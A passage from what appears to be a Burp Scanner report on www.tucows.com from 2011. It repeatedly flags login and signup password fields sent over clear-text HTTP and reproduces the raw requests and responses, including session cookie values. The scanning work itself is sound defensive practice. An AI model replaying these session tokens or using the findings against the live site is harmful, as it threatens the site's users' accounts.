                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.12. http://www.tucows.com/contact.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password fields:

Request

GET /contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.13. http://www.tucows.com/images/newassets/contact.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /images/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.14. http://www.tucows.com/images/newassets/contact.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password fields:

Request

GET /images/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.15. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.16. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password fields:

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.17. http://www.tucows.com/images/newassets/includes/js/aalib.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /images/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.18. http://www.tucows.com/images/newassets/includes/js/aalib.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password fields:

Request

GET /images/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.19. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /images/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.20. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password fields:

Request

GET /images/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.21. http://www.tucows.com/images/newassets/includes/js/show_layer.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /images/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.22. http://www.tucows.com/images/newassets/includes/js/show_layer.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /images/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.23. http://www.tucows.com/images/newassets/includes/js/signupin.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /images/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.24. http://www.tucows.com/images/newassets/includes/js/signupin.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /images/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
